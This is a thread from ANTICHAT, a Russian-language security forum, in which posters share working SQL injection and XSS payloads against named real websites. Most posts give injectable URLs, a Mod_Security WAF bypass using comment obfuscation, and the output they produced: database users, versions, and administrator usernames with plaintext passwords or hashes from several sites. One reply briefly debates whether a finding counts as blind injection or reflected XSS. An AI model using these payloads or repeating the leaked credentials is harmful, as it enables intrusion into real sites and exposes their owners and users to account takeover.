ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.12.2016, 16:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
909
Репутация:
0
|
|
Exploit :
Boolean Based SQL Injection
Код:
Code:
http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns
|
|
|
|
04.02.2017, 15:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
1802
Репутация:
7
|
|
Обход WAF ( Mod_Security)
http://www.slightergolf.com/products...p?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,user(),6,7,8,9,10,11--+
USER(): slighter_sgAdmin@localhos
http://www.slightergolf.com/products...p?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,/*!CONVERT*/(/*!12345GrOuP_CoNcAT(name,0x3a,password)*/ USING latin1),6,7,8,9,10,11 /*!12345from*/ admins--+
Name:misty,slighter,sgadmin
Password:svD1A0JC5ggN,C4XTZLtTlTUg,C4XTZLtTlTUg |
|
|
|
04.02.2017, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
1802
Репутация:
7
|
|
|
|
|
|
04.02.2017, 20:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
|
|
|
|
05.02.2017, 17:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
1802
Репутация:
7
|
|
SQL INJECTIONProviding Turnkey Solutions To Automotive Industry
http://www.nashgroup.co.in/about.php?catid=-5 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9--+
nashgrou_user@localhost : nashgrou_dbnew : 5.5.52-cll
http://www.nashgroup.co.in/about.php?catid=-5 union select 1,concat(username,0x3a,userpass),3,4,5,6,7,8,9 from tbladmin--+
orangedc:XCIJIlczVnYEIFAxAG8MPQ==
|
|
|
|
05.02.2017, 21:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
1802
Репутация:
7
|
|
SQL INJECTION DRONES LAB
https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX
droneslab@localhost : droneslab_website : 10.1.18-MariaDB
USER_PRIVILEGES:droneslab'@'localhost' -> NO |
|
|
|
09.02.2017, 14:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Firefox
Код:
Code:
http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
 |
|
|
|
10.02.2017, 04:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
28741
Репутация:
12
|
|
Blind SQL injection
agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.
Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется.
|
|
|
|
16.02.2017, 12:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
|
|
|
|
19.02.2017, 00:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от leksadin
leksadin said:
↑
Blind SQL injection
agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.
Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки () весь остальной текст удаляется. Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
